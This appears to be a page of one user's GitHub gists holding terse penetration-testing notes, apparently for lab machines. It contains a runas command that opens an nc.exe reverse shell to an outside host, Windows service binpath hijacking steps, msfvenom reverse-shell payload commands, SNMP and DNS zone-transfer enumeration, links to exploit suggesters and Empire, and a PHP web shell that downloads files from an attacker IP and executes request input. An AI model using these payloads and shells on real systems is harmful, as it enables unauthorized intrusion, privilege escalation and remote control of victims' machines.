feng-zhe
/ windows_privesc
Created
December 7, 2018 00:20
— forked from sckalath/windows_privesc
Windows Privilege Escalation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // What system are we connected to? | |
| systeminfo | findstr /B /C:"OS Name" /C:"OS Version" | |
| // Get the hostname and username (if available) | |
| hostname | |
| echo %username% | |
| // Get users | |
| net users | |
| net user [username] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sometimes if the user has saved the credention in cmdkey, we can use runas to use the saved credential to run command as them. | |
| - list saved cmd keys: `cmdkey /list` | |
| - runas administrator under ACCESS domain: `runas /user:ACCESS\administrator /savecred "C:\xxxxx\nc.exe -nv xxxxx 443 -e C:\Windows\System32\cmd.exe"` |
feng-zhe
/ windows service replace attack
Created
December 28, 2018 14:34
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| - accesschk.exe /accepteula -uwcqv "Authenticated Users" | |
| - sc qc <service> | |
| - sc config <service> binpath= "<new bin path>" | |
| - sc config <service> obj= ".\LocalSystem" password= "" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| - snmpwalk -c public -v1 <target> | |
| - snmp-check -w -t 30 <target> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| msfvenom -p cmd/unix/reverse_python LHOST=10.11.0.57 LPORT=80 SHELL=/bin/bash -v payload -a cmd --platform Unix | |
| msfvenom -p python/shell_reverse_tcp LHOST=10.10.12.12 LPORT=4444 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Sometings the DNS settings will affect the website page because of the server-side code. | |
| vim /etc/hosts and add a line like "<ip> domain", e.g. "10.10.10.120 chaos.htb" | |
| dig axfr @10.10.10.xx xxx.htb | |
| dnsrecon -n <dns server ip> -r <ip range> --db xxx.db | |
| e.g. dnsrecon -n 10.10.10.83 -r 10.0.0.0/8 --db olympus.db |
feng-zhe
/ escape rbash
Created
January 1, 2019 14:17
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| have a www-data shell and has credential for user xxx, but user xxx uses rbash => su -l xxxx |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| while l < r: | |
| mid = (l + r) // 2 | |
| if vals[mid] < target: | |
| l = mid + 1 | |
| else: | |
| r = mid | |
| return r | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://github.com/rasta-mouse/Watson | |
| https://github.com/rasta-mouse/Sherlock | |
| https://github.com/GDSSecurity/Windows-Exploit-Suggester.git | |
| https://github.com/EmpireProject/Empire | |
| note, remember to add the function you want to use at the bottom of the sherlock.ps1 to use that function. e.g. "Find-AllVulns". | |
| No "()". Similar to PowerUp.ps1 (enum all low-handing fruit) in Empire, add "Invoke-AllChecks". | |
| For the "windows-exploit-suggester.py": | |
| python windows-exploit-suggester.py --update |
feng-zhe
/ php cmd + upload
Last active
May 4, 2019 23:49
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if(isset($_REQUEST['fupload'])) { | |
| file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.10.14.19/" . $_REQUEST['fupload'])); | |
| }; | |
| if(isset($_REQUEST['fexec'])) { | |
| echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>"; | |
| }; | |
| ?> |
OlderNewer